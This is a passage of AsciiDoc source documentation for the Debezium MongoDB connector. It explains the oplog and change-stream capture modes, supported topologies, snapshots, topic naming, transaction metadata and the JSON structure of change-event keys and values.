communications problems.\n\nifdef::community[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the MongoDB versions that are compatible with this connector, see the 
link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nInformation and procedures for using a {prodname} MongoDB connector is organized as follows:\n\n* xref:overview-of-debezium-mongodb-connector[]\n* xref:how-debezium-mongodb-connectors-work[]\n* xref:descriptions-of-debezium-mongodb-connector-data-change-events[]\n* xref:setting-up-mongodb-to-work-with-debezium[]\n* xref:deployment-of-debezium-mongodb-connectors[]\n* xref:monitoring-debezium-mongodb-connector-performance[]\n* xref:how-debezium-mongodb-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} MongoDB connector\n\/\/ ModuleID: overview-of-debezium-mongodb-connector\n[[mongodb-overview]]\n== Overview\n\nMongoDB's replication mechanism provides redundancy and high availability, and is the preferred way to run MongoDB in production.\nMongoDB connector captures the changes in a replica set or sharded cluster.\n\nA MongoDB _replica set_ consists of a set of servers that all have copies of the same data, and replication ensures that all changes made by clients to documents on the replica set's _primary_ are correctly applied to the other replica set's servers, called _secondaries_.\nMongoDB replication works by having the primary record the changes in its _oplog_ (or operation log), and then each of the secondaries reads the primary's oplog and applies in order all of the operations to their own documents.\nWhen a new server is added to a replica set, that server first performs an https:\/\/docs.mongodb.com\/manual\/core\/replica-set-sync\/[snapshot] of all of the databases and collections on the primary, and then reads the primary's oplog to apply all changes that might have been made since it began the snapshot.\nThis new server becomes a secondary (and able to handle queries) when it catches up to the tail of the primary's oplog.\n\nMongoDB connector supports two distinct modes of capturing the changes controlled by the xref:mongodb-property-capture-mode[`capture.mode`] option:\n\n* oplog based\n* change streams based\n\n'''\n\n=== Oplog capture mode (legacy)\n\nThe {prodname} MongoDB connector uses the same replication mechanism as described above, though it does not actually become a member of the replica set.\nJust like MongoDB secondaries, however, the connector always reads the oplog of the replica set's primary.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then starts streaming changes from the position it read earlier from the oplog. Operations in the MongoDB oplog are https:\/\/docs.mongodb.com\/manual\/core\/replica-set-oplog\/[idempotent], so no matter how many times the operations are applied, they result in the same end state.\n\nThe disadvantage of this mode is that only _insert_ change events will contain the full document, whereas _update_ events only contain a representation of changed fields (i.e. 
unmodified fields cannot be obtained from an _update_ event), and _delete_ events contain no representation of the deleted document apart from its key.\n\nThis mode should be considered as the legacy one.\nIt is not supported on MongoDB 5 and the user is strongly advised to not use it for MongoDB 4.x server.\n\n=== Change Stream mode\n\nThe {prodname} MongoDB connector uses a similar replication mechanism to the one described above, though it does not actually become a member of the replica set.\nThe main difference is that the connector does not read the oplog directly, but delegates capturing and decoding the oplog to MongoDB's https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams] feature.\nWith change streams, the MongoDB server exposes changes to collections as an event stream.\nThe {prodname} connector watches the stream and delivers the changes downstream.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then creates a change stream from the position it read earlier from the oplog.\n\nThis is the recommended mode starting with MongoDB 4.x.\n\n[WARNING]\n====\nBoth capture modes use different values stored in offsets that allow them to resume streaming from the last position seen after a connector restart.\nThus it is not possible to switch from the change streams mode to the oplog mode.\nTo prevent any inadvertent capture mode changes, the connector has a built-in safety check.\n\nWhen the connector is started it checks the stored offsets.\nIf the original capture mode was oplog-based and the new mode is change streams based, then it will try to migrate to change streams.\nIf the original capture mode was change streams based, it will keep using change streams, also if the new mode is oplog-based, and a warning about this will be emitted to the logs.\n====\n\nAs the MongoDB connector processes changes, it periodically records the position in the oplog\/stream where the event originated.\nWhen the connector stops, it records the last oplog\/stream position that it processed, so that upon restart it simply begins streaming from that position.\nIn other words, the connector can be stopped, upgraded or maintained, and restarted some time later, and it will pick up exactly where it left off without losing a single event.\nOf course, MongoDB's oplogs are usually capped at a maximum size, which means that the connector should not be stopped for too long, or else some of the operations in the oplog might be purged before the connector has a chance to read them.\nIn this case, upon restart the connector will detect the missing oplog operations, perform a snapshot, and then proceed with streaming the changes.\n\nThe MongoDB connector is also quite tolerant of changes in membership and leadership of the replica sets, of additions or removals of shards within a sharded cluster, and network problems that might cause communication failures.\nThe connector always uses the replica set's primary node to stream changes, so when the replica set undergoes an election and a different node becomes primary, the connector will immediately stop streaming changes, connect to the new primary, and start streaming changes using the new primary node.\nLikewise, if connector experiences any problems communicating with the replica set primary, it will try to reconnect (using exponential backoff so as to not 
overwhelm the network or replica set) and continue streaming changes from where it last left off.\nIn this way the connector is able to dynamically adjust to changes in replica set membership and to automatically handle communication failures.\n\n.Additional resources\n\n* link:https:\/\/docs.mongodb.com\/manual\/replication\/[Replication mechanism]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set\/[Replica set]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/replica-set-elections\/[Replica set elections]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/sharded-cluster-components\/[Sharded cluster]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/add-shards-to-shard-cluster\/[Shard addition]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/remove-shards-from-cluster\/[Shard removal]\n* link:https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mongodb-connectors-work\n\/\/ Title: How {prodname} MongoDB connectors work\n[[how-the-mongodb-connector-works]]\n== How the MongoDB connector works\n\nAn overview of the MongoDB topologies that the connector supports is useful for planning your application.\n\nWhen a MongoDB connector is configured and deployed, it starts by connecting to the MongoDB servers at the seed addresses, and determines the details about each of the available replica sets.\nSince each replica set has its own independent oplog, the connector will try to use a separate task for each replica set.\nThe connector can limit the maximum number of tasks it will use, and if not enough tasks are available the connector will assign multiple replica sets to each task, although the task will still use a separate thread for each replica set.\n\n[NOTE]\n====\nWhen running the connector against a sharded cluster, use a value of `tasks.max` that is greater than the number of replica sets.\nThis will allow the connector to create one task for each replica set, and will let Kafka Connect coordinate, distribute, and manage the tasks across all of the available worker processes.\n====\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector works:\n\n* xref:mongodb-topologies-supported-by-debezium-connectors[]\n* xref:how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters[]\n* xref:how-debezium-mongodb-connectors-perform-snapshots[]\n* xref:how-the-debezium-mongodb-connector-streams-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records[]\n* xref:how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector[]\n* xref:debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: mongodb-topologies-supported-by-debezium-connectors\n\/\/ Title: MongoDB topologies supported by {prodname} connectors\n[[supported-mongodb-topologies]]\n=== Supported MongoDB topologies\n\nThe MongoDB connector supports the following MongoDB topologies:\n\n[[mongodb-replicaset]]\nMongoDB replica set::\nThe {prodname} MongoDB connector can capture changes from a single https:\/\/docs.mongodb.com\/manual\/replication\/[MongoDB replica set].\nProduction replica sets require a minimum of https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architecture-three-members\/[at least three members].\n+\nTo use the MongoDB connector with a replica set, provide the addresses of one or more replica set 
servers as _seed addresses_ through the connector's `mongodb.hosts` property.\nThe connector will use these seeds to connect to the replica set, and then once connected will get from the replica set the complete set of members and which member is primary.\nThe connector will start a task to connect to the primary and capture the changes from the primary's oplog.\nWhen the replica set elects a new primary, the task will automatically switch over to the new primary.\n+\n[NOTE]\n====\nWhen MongoDB is fronted by a proxy (such as with Docker on OS X or Windows), then when a client connects to the replica set and discovers the members, the MongoDB client will exclude the proxy as a valid member and will attempt and fail to connect directly to the members rather than go through the proxy.\n\nIn such a case, set the connector's optional `mongodb.members.auto.discover` configuration property to `false` to instruct the connector to forgo membership discovery and instead simply use the first seed address (specified via the `mongodb.hosts` property) as the primary node.\nThis may work, but still make cause issues when election occurs.\n====\n\n[[mongodb-sharded-cluster]]\nMongoDB sharded cluster::\nA https:\/\/docs.mongodb.com\/manual\/sharding\/[MongoDB sharded cluster] consists of:\n* One or more _shards_, each deployed as a replica set;\n* A separate replica set that acts as the cluster's _configuration server_\n* One or more _routers_ (also called `mongos`) to which clients connect and that routes requests to the appropriate shards\n+\nTo use the MongoDB connector with a sharded cluster, configure the connector with the host addresses of the _configuration server_ replica set. When the connector connects to this replica set, it discovers that it is acting as the configuration server for a sharded cluster, discovers the information about each replica set used as a shard in the cluster, and will then start up a separate task to capture the changes from each replica set. 
If new shards are added to the cluster or existing shards removed, the connector will automatically adjust its tasks accordingly.\n\n[[mongodb-standalone-server]]\nMongoDB standalone server::\nThe MongoDB connector is not capable of monitoring the changes of a standalone MongoDB server, since standalone servers do not have an oplog.\nThe connector will work if the standalone server is converted to a replica set with one member.\n\n[NOTE]\n====\nMongoDB does not recommend running a standalone server in production.\nFor more information, see the https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architectures\/[MongoDB documentation].\n====\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors use logical names for replica sets and sharded clusters\n\/\/ ModuleID: how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters\n[[mongodb-logical-connector-name]]\n=== Logical connector name\n\nThe connector configuration property `mongodb.name` serves as a _logical name_ for the MongoDB replica set or sharded cluster.\nThe connector uses the logical name in a number of ways: as the prefix for all topic names, and as a unique identifier when recording the oplog\/change stream position of each replica set.\n\nYou should give each MongoDB connector a unique logical name that meaningfully describes the source MongoDB system.\nWe recommend logical names begin with an alphabetic or underscore character, and remaining characters that are alphanumeric or underscore.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors perform snapshots\n\/\/ ModuleID: how-debezium-mongodb-connectors-perform-snapshots\n[[mongodb-performing-a-snapshot]]\n=== Performing a snapshot\n\nWhen a task starts up using a replica set, it uses the connector's logical name and the replica set name to find an _offset_ that describes the position where the connector previously stopped reading changes.\nIf an offset can be found and it still exists in the oplog, then the task immediately proceeds with xref:{link-mongodb-connector}#mongodb-streaming-changes[streaming changes], starting at the recorded offset position.\n\nHowever, if no offset is found or if the oplog no longer contains that position, the task must first obtain the current state of the replica set contents by performing a _snapshot_.\nThis process starts by recording the current position of the oplog and recording that as the offset (along with a flag that denotes a snapshot has been started).\nThe task will then proceed to copy each collection, spawning as many threads as possible (up to the value of the `snapshot.max.threads` configuration property) to perform this work in parallel.\nThe connector will record a separate _read event_ for each document it sees, and that read event will contain the object's identifier, the complete state of the object, and _source_ information about the MongoDB replica set where the object was found.\nThe source information will also include a flag that denotes the event was produced during a snapshot.\n\nThis snapshot will continue until it has copied all collections that match the connector's filters.\nIf the connector is stopped before the tasks' snapshots are completed, upon restart the connector begins the snapshot again.\n\n[NOTE]\n====\nTry to avoid task reassignment and reconfiguration while the connector performs snapshots of any replica sets.\nThe connector generates log messages to report on the progress of the snapshot.\nTo provide for the greatest control, run a 
separate Kafka Connect cluster for each connector.\n====\n\n\/\/ Type: concept\n[id=\"mongodb-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nAd hoc snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"mongodb-incremental-snapshots\"]\n==== Incremental snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[NOTE]\n====\nIncremental snapshots are currently supported for single replica set deployments only.\nifdef::community[]\nThis limitation will be removed in the next version.\nendif::community[]\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-mongodb-connector-streams-change-event-records\n\/\/ Title: How the {prodname} MongoDB connector streams change event records\n[[mongodb-streaming-changes]]\n=== Streaming changes\n[[mongodb-tailing-the-oplog]]\n\nAfter the connector task for a replica set records an offset, it uses the offset to determine the position in the oplog where it should start streaming changes.\nThe task then (depending on the configuration) either connects to the replica set's primary node or connects to a replica-set-wide change stream and starts streaming changes from that position.\nIt processes all of create, insert, and delete operations, and converts them into {prodname} xref:{link-mongodb-connector}#mongodb-events[change events].\nEach change event includes the position in the oplog where the operation was found, and the connector periodically records this as its most recent offset.\nThe interval at which the offset is recorded is governed by link:https:\/\/kafka.apache.org\/documentation\/#offset.flush.interval.ms[`offset.flush.interval.ms`], which is a Kafka Connect worker configuration property.\n\nWhen the connector is stopped gracefully, the last offset processed is recorded so that, upon restart, the connector will continue exactly where it left off.\nIf the connector's tasks terminate unexpectedly, however, then the tasks may have processed and generated 
events after it last records the offset but before the last offset is recorded; upon restart, the connector begins at the last _recorded_ offset, possibly generating some the same events that were previously generated just prior to the crash.\n\n[NOTE]\n====\nWhen everything is operating nominally, Kafka consumers will actually see every message *_exactly once_*. However, when things go wrong Kafka can only guarantee consumers will see every message *_at least once_*. Therefore, your consumers need to anticipate seeing messages more than once.\n====\n\nAs mentioned above, the connector tasks always use the replica set's primary node to stream changes from the oplog, ensuring that the connector sees the most up-to-date operations as possible and can capture the changes with lower latency than if secondaries were to be used instead. When the replica set elects a new primary, the connector immediately stops streaming changes, connects to the new primary, and starts streaming changes from the new primary node at the same position. Likewise, if the connector experiences any problems communicating with the replica set members, it tries to reconnect, by using exponential backoff so as to not overwhelm the replica set, and once connected it continues streaming changes from where it last left off. In this way, the connector is able to dynamically adjust to changes in replica set membership and automatically handle communication failures.\n\nTo summarize, the MongoDB connector continues running in most situations. Communication problems might cause the connector to wait until the problems are resolved.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MongoDB change event records\n[[mongodb-topic-names]]\n=== Topic names\n\nThe MongoDB connector writes events for all insert, update, and delete operations to documents in each collection to a single Kafka topic.\nThe name of the Kafka topics always takes the form _logicalName_._databaseName_._collectionName_, where _logicalName_ is the xref:{link-mongodb-connector}#mongodb-logical-connector-name[logical name] of the connector as specified with the `mongodb.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _collectionName_ is the name of the MongoDB collection in which the affected document existed.\n\nFor example, consider a MongoDB replica set with an `inventory` database that contains four collections: `products`, `products_on_hand`, `customers`, and `orders`.\nIf the connector monitoring this database were given a logical name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNotice that the topic names do not incorporate the replica set name or shard name.\nAs a result, all changes to a sharded collection (where each shard contains a subset of the collection's documents) all go to the same Kafka topic.\n\nYou can set up Kafka to {link-kafka-docs}.html#basic_ops_add_topic[auto-create] the topics as they are needed.\nIf not, then you must use Kafka administration tools to create the topics before starting the connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector\n\/\/ Title: How event keys control 
topic partitioning for the {prodname} MongoDB connector\n[[mongodb-partitions]]\n=== Partitions\n\nThe MongoDB connector does not make any explicit determination about how to partition topics for events.\nInstead, it allows Kafka to determine how to partition topics based on event keys.\nYou can change Kafka's partitioning logic by defining the name of the `Partitioner` implementation in the Kafka Connect worker configuration.\n\nKafka maintains total order only for events written to a single topic partition.\nPartitioning the events by key does mean that all events with the same key always go to the same partition.\nThis ensures that all events for a specific document are always totally ordered.\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} MongoDB connector-generated events that represent transaction boundaries\n[[mongodb-transaction-metadata]]\n=== Transaction Metadata\n\n{prodname} can generate events that represents transaction metadata boundaries and enrich change data event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nFor every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n`status`:: `BEGIN` or `END`\n`id`:: String representation of unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` that provides number of events emitted by changes originating from given data collection.\n\nThe following example shows a typical message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"1462833718356672513\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"1462833718356672513\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"rs0.testDB.collectiona\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"rs0.testDB.collectionb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:{link-mongodb-connector}#mongodb-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:mongodb-property-mongodb-name[`_<mongodb.name>_`]`.transaction`.\n\n.Change data event enrichment\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier.\n`total_order`:: The absolute position of the event among all events generated by the transaction.\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction.\n\nFollowing is an example of what a message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"patch\": null,\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\",\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": 
{\n \"id\": \"1462833718356672513\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mongodb-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MongoDB connector data change events\n[[mongodb-events]]\n== Data change events\n\nThe {prodname} MongoDB connector generates a data change event for each document-level operation that inserts, updates, or deletes data. Each event contains a key and a value. The structure of the key and the value depends on the collection that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the key for the document that was changed.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the document that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the document that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the document that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating collection. See xref:{link-mongodb-connector}#mongodb-topic-names[topic names].\n\n[WARNING]\n====\nThe MongoDB connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. 
Each remaining character in the logical server name and each character in the database and collection names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a collection name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n\nifdef::product[]\nFor more information, see the following topics:\n\n* xref:about-keys-in-debezium-mongodb-change-events[]\n* xref:about-values-in-debezium-mongodb-change-events[]\nendif::product[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mongodb-change-events\n\/\/ Title: About keys in {prodname} MongoDB change events\n[[mongodb-change-events-key]]\n=== Change event keys\n\nA change event's key contains the schema for the changed document's key and the changed document's actual key. For a given collection, both the schema and its corresponding payload contain a single `id` field.\nThe value of this field is the document's identifier represented as a string that is derived from link:https:\/\/docs.mongodb.com\/manual\/reference\/mongodb-extended-json\/[MongoDB extended JSON serialization strict mode].\n\nConsider a connector with a logical name of `fulfillment`, a replica set containing an `inventory` database, and a `customers` collection that contains documents such as the following.\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` collection has the same event key schema. For as long as the `customers` collection has the previous definition, every change event that captures a change to the `customers` collection has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"fulfillment.inventory.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"field\": \"id\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1004\"\n }\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fulfillment.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the key for the document that was changed. Key schema names have the format _connector-name_._database-name_._collection-name_.`Key`. In this example: +\n\n* `fulfillment` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the collection that was changed. +\n* `customers` is the collection that contains the document that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. 
A value in the key's payload field is optional when a document does not have a key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the document for which this change event was generated. In this example, the key contains a single `id` field of type `string` whose value is `1004`.\n\n|===\n\nThis example uses a document with an integer identifier, but any valid MongoDB document identifier works the same way, including a document identifier. For a document identifier, an event key's `payload.id` value is a string that represents the updated document's original `_id` field as a MongoDB extended JSON serialization that uses strict mode. The following table provides examples of how different types of `_id` fields are represented.\n\n.Examples of representing document `_id` fields in event key payloads\n[options=\"header\",role=\"code-wordbreak-col2 code-wordbreak-col3\"]\n|===\n|Type |MongoDB `_id` Value|Key's payload\n|Integer |1234|`{ \"id\" : \"1234\" }`\n|Float |12.34|`{ \"id\" : \"12.34\" }`\n|String |\"1234\"|`{ \"id\" : \"\\\"1234\\\"\" }`\n|Document|`{ \"hi\" : \"kafka\", \"nums\" : [10.0, 100.0, 1000.0] }`|`{ \"id\" : \"{\\\"hi\\\" : \\\"kafka\\\", \\\"nums\\\" : [10.0, 100.0, 1000.0]}\" }`\n|ObjectId |`ObjectId(\"596e275826f08b2730779e1f\")`|`{ \"id\" : \"{\\\"$oid\\\" : \\\"596e275826f08b2730779e1f\\\"}\" }`\n|Binary |`BinData(\"a2Fma2E=\",0)`|`{ \"id\" : \"{\\\"$binary\\\" : \\\"a2Fma2E=\\\", \\\"$type\\\" : \\\"00\\\"}\" }`\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mongodb-change-events\n\/\/ Title: About values in {prodname} MongoDB change events\n[[mongodb-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. 
Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample document that was used to show an example of a change event key:\n\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\nThe value portion of a change event for a change to this document is described for each event type:\n\n* <<mongodb-create-events,_create_ events>>\n* <<mongodb-update-events,_update_ events>>\n* <<mongodb-delete-events,_delete_ events>>\n* <<mongodb-tombstone-events,Tombstone events>>\n\n[id=\"mongodb-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` collection:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\", \/\/ <2>\n \"version\": 1,\n \"field\": \"after\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\",\n \"version\": 1,\n \"field\": \"patch\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"rs\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"collection\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ord\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"h\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mongo.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"dbserver1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\", \/\/ <6>\n \"patch\": null,\n \"source\": { \/\/ <7>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 31,\n \"h\": 1546547425148721999\n },\n \"op\": \"c\", \/\/ <8>\n \"ts_ms\": 1558965515240 \/\/ <9>\n }\n }\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. 
